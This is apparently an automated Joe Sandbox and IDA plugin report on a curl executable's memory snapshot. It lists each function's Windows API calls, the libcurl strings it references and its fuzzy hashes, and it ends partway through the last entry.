Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __swprintf_l
String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd
API String ID: 1488884202-564197712
Opcode ID: 387fad4af4828e61841ecabec197d1648980ef3d48d59ce15a855c2605f8d7ca
Instruction ID: 2121bf020d449fdd1313af182a62586bb90ef9b286f05f452a70c9a32f93c0a3
Opcode Fuzzy Hash: 387fad4af4828e61841ecabec197d1648980ef3d48d59ce15a855c2605f8d7ca
Instruction Fuzzy Hash: 03210AF5F0578947DE2887A8BC027C242A9A7E9BC0F88D136DC4C0B7B5E66C5347C201

Function 000000013F4A28E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 000000013F4A2929
WSAIoctl.WS2_32 ref: 000000013F4A29AC
WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,000000013F4A3D09), ref: 000000013F4A29B6

Strings

Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 000000013F4A29BF
Failed to set SO_KEEPALIVE on fd %d, xrefs: 000000013F4A2936

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorIoctlLastsetsockopt
String ID: Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d
API String ID: 1819429192-3022933585
Opcode ID: d80fc1cefa104c438a7b93679a951798409771616211c00dff60a569a790e7f6
Instruction ID: 4c1bb002f345b27bb0e8bb33711b8bc63fa9222c01fc53e4346e23044fb2efc5
Opcode Fuzzy Hash: d80fc1cefa104c438a7b93679a951798409771616211c00dff60a569a790e7f6
Instruction Fuzzy Hash: FE21517271478086F710CF65E44439FB7A4F789BD4F50423AEA8987A99DB7CC249CB00

Function 000000013F4B62A8 Relevance: 7.7, APIs: 5, Instructions: 240networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32 ref: 000000013F4B6499
select.WS2_32 ref: 000000013F4B6538
__WSAFDIsSet.WS2_32 ref: 000000013F4B657B
__WSAFDIsSet.WS2_32 ref: 000000013F4B65AF
__WSAFDIsSet.WS2_32 ref: 000000013F4B65D1

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLastselect
String ID:
API String ID: 215497628-0
Opcode ID: 70d87924a9dd3d5a512c1a49ba71c278a57e0e3e8dbcd4e8eeac3d300bf829d1
Instruction ID: 4b457d2d0d54c677f6e76c114b32021167911ee8b9caebfaba0d46ec1b8a5344
Opcode Fuzzy Hash: 70d87924a9dd3d5a512c1a49ba71c278a57e0e3e8dbcd4e8eeac3d300bf829d1
Instruction Fuzzy Hash: F0910932B14A9886FF298F24D4547EB72A4FB40B98F14527CEAA5476C6DB38CF56C700

Function 000000013F4926E4 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 206COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4928AC
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4928DD

Strings

too many globs, xrefs: 000000013F4929C9
unmatched close brace/bracket, xrefs: 000000013F4929AD
out of memory, xrefs: 000000013F4928C3

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: malloc
String ID: out of memory$too many globs$unmatched close brace/bracket
API String ID: 2803490479-3324938048
Opcode ID: 7103fd6da3cd217828e071422216ff0b3568705547e3e87d28e13c3ea1abe095
Instruction ID: 43e51fe42c019187d854a18156863f79fc0a2709d8fdc4835e22e3bc0cf417b1
Opcode Fuzzy Hash: 7103fd6da3cd217828e071422216ff0b3568705547e3e87d28e13c3ea1abe095
Instruction Fuzzy Hash: 30917832B08B808AFB95CF21E4543EF7BA0F745B98F144529EE8A17796DB38C656C740

Function 000000013F4840BC Relevance: 7.5, APIs: 6, Instructions: 35COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000000013F482B5C), ref: 000000013F4840ED
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000000013F482B5C), ref: 000000013F4840FC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48410B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48411A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F484129
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F484140

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: d3f1909efe46ac51edbeecf526d99a3404d1ec5c98fd0992748029f9baba6dde
Instruction ID: 7a52bf8a0a6687202d3c6fced6bc858c2daf461ee60e03dce0d8a726de7b06b0
Opcode Fuzzy Hash: d3f1909efe46ac51edbeecf526d99a3404d1ec5c98fd0992748029f9baba6dde
Instruction Fuzzy Hash: B7110036611A0482FF55DFA1E46536A3370FB88F89F141628DE0E46295DF39C555C245

Function 000000013F49AE78 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 000000013F49B021
__swprintf_l.LIBCMT ref: 000000013F49B168

Part of subcall function 000000013F4AEFB0: WaitForSingleObjectEx.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,000000013F49AED4), ref: 000000013F4AEFE3
Part of subcall function 000000013F4AEFB0: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 000000013F4AEFEE

Strings

Connection cache is full, closing the oldest one, xrefs: 000000013F49B1C7
Connection #%ld to host %s left intact, xrefs: 000000013F49B14F

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: CloseHandleObjectSingleWait__swprintf_l_time64
String ID: Connection #%ld to host %s left intact$Connection cache is full, closing the oldest one
API String ID: 2773606893-1048602531
Opcode ID: 432352585140fa902e4db93c5e23cc558f6be77b48866f189e77ede509ee8192
Instruction ID: b715e464e6b2010ffd5b6d7993c252ff0db3448edb0275c2e79bc43c5756c8b4
Opcode Fuzzy Hash: 432352585140fa902e4db93c5e23cc558f6be77b48866f189e77ede509ee8192
Instruction Fuzzy Hash: 45B16B32B00B8482EB64EF25E8553EF63A0F785B84F08513ADE5A1B399DF38D656C750

Function 000000013F4B2200 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 227networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32 ref: 000000013F4B24D6
setsockopt.WS2_32 ref: 000000013F4B24FE

Strings

Failed to alloc scratch buffer, xrefs: 000000013F4B23A6
We are completely uploaded and fine, xrefs: 000000013F4B25A4

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: Ioctlsetsockopt
String ID: Failed to alloc scratch buffer$We are completely uploaded and fine
API String ID: 1903391676-2419666956
Opcode ID: 35fd0e26329c2e5d6be6f503f0ccff65e94623c70a3b2047a20998440881e4e9
Instruction ID: f7494cd1f94bafb26eb9031fa3a704b9c677ce81f47fa31aca2a10298123d453
Opcode Fuzzy Hash: 35fd0e26329c2e5d6be6f503f0ccff65e94623c70a3b2047a20998440881e4e9
Instruction Fuzzy Hash: 21B16F32705BC896FA6A8B3596403EBB7A4F749B84F440139DB9907792DB38DA72C740

Function 000000013F4B6B98 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 213COMMON

Download Yara Rule

APIs

fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000000013F4B6EC2

Strings

** Resuming transfer from byte position %I64d, xrefs: 000000013F4B6C20
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s, xrefs: 000000013F4B6E61
%% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 000000013F4B6C33

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: fflush
String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d
API String ID: 497872470-664487449
Opcode ID: f6cc403234ab24a6ccd709371225e56054959eb24fa1324d6ef3ed700ac6cb8d
Instruction ID: 6296a1c997f565bc2f903062e27d38f283215fd828ac250a1ad891d4258e2edb
Opcode Fuzzy Hash: f6cc403234ab24a6ccd709371225e56054959eb24fa1324d6ef3ed700ac6cb8d
Instruction Fuzzy Hash: D1919332B01B9881EE40DB6AE5557DA73A8FB84BC8F45102AEE4D57B66DF34CA12C700

Function 000000013F4B58BC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 198COMMON

Download Yara Rule

APIs

inet_pton.WS2_32 ref: 000000013F4B59F2
inet_pton.WS2_32 ref: 000000013F4B5A28

Strings

localhost, xrefs: 000000013F4B5A73
Hostname %s was found in DNS cache, xrefs: 000000013F4B5938

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: inet_pton
String ID: Hostname %s was found in DNS cache$localhost
API String ID: 1350483568-3522642687
Opcode ID: 4ee8407b60bbade95cf76e8e2920379f7cc77a306ebc8ec6573fc6f92ed525ef
Instruction ID: f9f126ccf4539ece67e6ff2079caec7fea4c28810739ac3b4e78cb4cfda359d6
Opcode Fuzzy Hash: 4ee8407b60bbade95cf76e8e2920379f7cc77a306ebc8ec6573fc6f92ed525ef
Instruction Fuzzy Hash: 1281A131B0578880FB659B6698507EB66A1AB44BD4F48403DDE892B7DFDF34CA43D310

Function 000000013F4A5758 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120fileCOMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,000000013F49DE4D), ref: 000000013F4A580A
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,000000013F49DE4D), ref: 000000013F4A5827
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,000000013F49DE4D), ref: 000000013F4A58A9

Strings

Set-Cookie:, xrefs: 000000013F4A58BA

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __acrt_iob_funcfclosefopen
String ID: Set-Cookie:
API String ID: 4110152555-2427311273
Opcode ID: 58dabe0e95b27be41a14ae10c8e4b7d34450b216fd677b6ec1fe5318a811b9da
Instruction ID: 96f328cffdc7b124dcec083e58112d1f3505fe575555e8d3c888c0e327c0b22b
Opcode Fuzzy Hash: 58dabe0e95b27be41a14ae10c8e4b7d34450b216fd677b6ec1fe5318a811b9da
Instruction Fuzzy Hash: E5410331A0478485FF659B22A6003EB67B0B754BD4F58403CDE4A0B7A2DF3CCA1B8300

Function 000000013F498EE4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F498F2C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F498F3A
__swprintf_l.LIBCMT ref: 000000013F49906E

Strings

%u.%u.%u.%u, xrefs: 000000013F49905F

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __swprintf_l_errnostrtoul
String ID: %u.%u.%u.%u
API String ID: 3822977173-1542503432
Opcode ID: 1f30ee1e9ff87b2e4371e72a35b9e96df50a113ad7cb5ef3248472817614dcce
Instruction ID: 1a37452c4e893dff580b0d03d247c4d1ceddd79ce1595b78bc1874cc60004ac6
Opcode Fuzzy Hash: 1f30ee1e9ff87b2e4371e72a35b9e96df50a113ad7cb5ef3248472817614dcce
Instruction Fuzzy Hash: D0419172F042904AF7708B7598407FF3BE1A3857E8F544539EE6522E99D638CB82DB10

Function 000000013F4913AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F491406
isprint.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4914C5
__swprintf_l.LIBCMT ref: 000000013F4914DF

Strings

\x%02x, xrefs: 000000013F4914D2

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __swprintf_lisprintmalloc
String ID: \x%02x
API String ID: 646383617-50714050
Opcode ID: 22c699b7bdc6f8c99bf79f02619325e5f62e9853553d1ccccfc965a1fa40d3d3
Instruction ID: 734486a89984850102302e3e50bdb5cb3cb0f659ba8950c0c09eff0652a8a613
Opcode Fuzzy Hash: 22c699b7bdc6f8c99bf79f02619325e5f62e9853553d1ccccfc965a1fa40d3d3
Instruction Fuzzy Hash: 86418176F4829088F7214F25F9007FB77B0A7A8BA4F04513AED99873D6E96C8683D341

Function 000000013F4A20E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 000000013F4A2209
send.WS2_32 ref: 000000013F4A222A
WSAGetLastError.WS2_32 ref: 000000013F4A223C

Strings

Send failure: %s, xrefs: 000000013F4A2270

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLastrecvsend
String ID: Send failure: %s
API String ID: 3418755260-857917747
Opcode ID: 7f799834ccd8be315abf0fb78740d62675f2f58060e425cb48ae3f8f22a7b006
Instruction ID: 4ef00896d46d41cde32b26bc05d54e92815755e658c75cbf3c07f9d1dff4d7ce
Opcode Fuzzy Hash: 7f799834ccd8be315abf0fb78740d62675f2f58060e425cb48ae3f8f22a7b006
Instruction Fuzzy Hash: CA41AF72B01B8186FA618F55A944BEA2390F748BB8F440339DE68473D9DF3CD266D300

Function 000000013F4BC908 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4BC9B2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4BCA03
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4BCA42

Strings

realm, xrefs: 000000013F4BC999

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: free$_strdup
String ID: realm
API String ID: 2653869212-4204190682
Opcode ID: 3a493681dc92efc8fdbbf39734521db5c68439b0495f61c1c317c20e1a91c94f
Instruction ID: b1c2dc28c6ae7243f971d25e6eaa3b008d7e78070c216c17a93e6f48380ed123
Opcode Fuzzy Hash: 3a493681dc92efc8fdbbf39734521db5c68439b0495f61c1c317c20e1a91c94f
Instruction Fuzzy Hash: AE418031910B8885FB64CB25E8943EA37A0F749794F445239EBDE436D6DB38CB46C740

Function 000000013F493688 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,000000013F49385A,?,?,?,?,?,?,?,?,?,00000000,00000000,000000013F493585), ref: 000000013F4936BD
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,000000013F49385A,?,?,?,?,?,?,?,?,?,00000000,00000000,000000013F493585), ref: 000000013F493722
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,000000013F49385A,?,?,?,?,?,?,?,?,?,00000000,00000000,000000013F493585), ref: 000000013F49376A

Strings

u%04x, xrefs: 000000013F4936FC

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: fputc$fputs
String ID: u%04x
API String ID: 1019900953-2707630279
Opcode ID: 277b776edbe826962224f75c53135ca2eff72bcc5dcb1799fcb2f0b914ff2d5d
Instruction ID: 09503c6d813396303a060253d97d010d730989fc558fa4c26e427a328d2c59b8
Opcode Fuzzy Hash: 277b776edbe826962224f75c53135ca2eff72bcc5dcb1799fcb2f0b914ff2d5d
Instruction Fuzzy Hash: 36319875F0854191F7689F25A9683FB6765A3527D0F94817DD61B027D5FB28CB43C300

Function 000000013F490590 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,000000013F4906E3,?,?,?,?,?,?,?,?,00000000,?), ref: 000000013F4905BE
__swprintf_l.LIBCMT ref: 000000013F490624
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,000000013F4906E3,?,?,?,?,?,?,?,?,00000000,?), ref: 000000013F490636

Strings

%s%s, xrefs: 000000013F490617

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: FileModuleName__swprintf_lfopen
String ID: %s%s
API String ID: 3556930314-3252725368
Opcode ID: 3fa6b3d57e66f1a6e0ac0f9c7fdfc62a7c539cec841c2add17cc1eaa0e81cd95
Instruction ID: 50d39e834542502ad12f570f8a8067b55f926fcf82d8216befe86a02e3e3ff60
Opcode Fuzzy Hash: 3fa6b3d57e66f1a6e0ac0f9c7fdfc62a7c539cec841c2add17cc1eaa0e81cd95
Instruction Fuzzy Hash: 64115E35B14B9089F7109F25A4043DBB7A0E355BA0F884639EEA9877EADF38C646C740

Function 000000013F4D442C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 000000013F4D4443
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4D4453
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4D4486

Strings

%s/%s, xrefs: 000000013F4D443C

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _scwprintf_strdupfree
String ID: %s/%s
API String ID: 3289749495-2758257063
Opcode ID: 1af5d54ccb8866b7ce120fc8528325686a59531db20074365c90e5db1c5f1883
Instruction ID: 0f7a9f219fd75a5e803ca74195d285ceb92383db437dfcc9283fa141857b85ab
Opcode Fuzzy Hash: 1af5d54ccb8866b7ce120fc8528325686a59531db20074365c90e5db1c5f1883
Instruction Fuzzy Hash: F2F01D30B1174481EE449B56B9647E7A2A06B4DFC0F04443DAE0D477A6ED2CC6868340

Function 000000013F4BC480 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013F493968: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F49399D
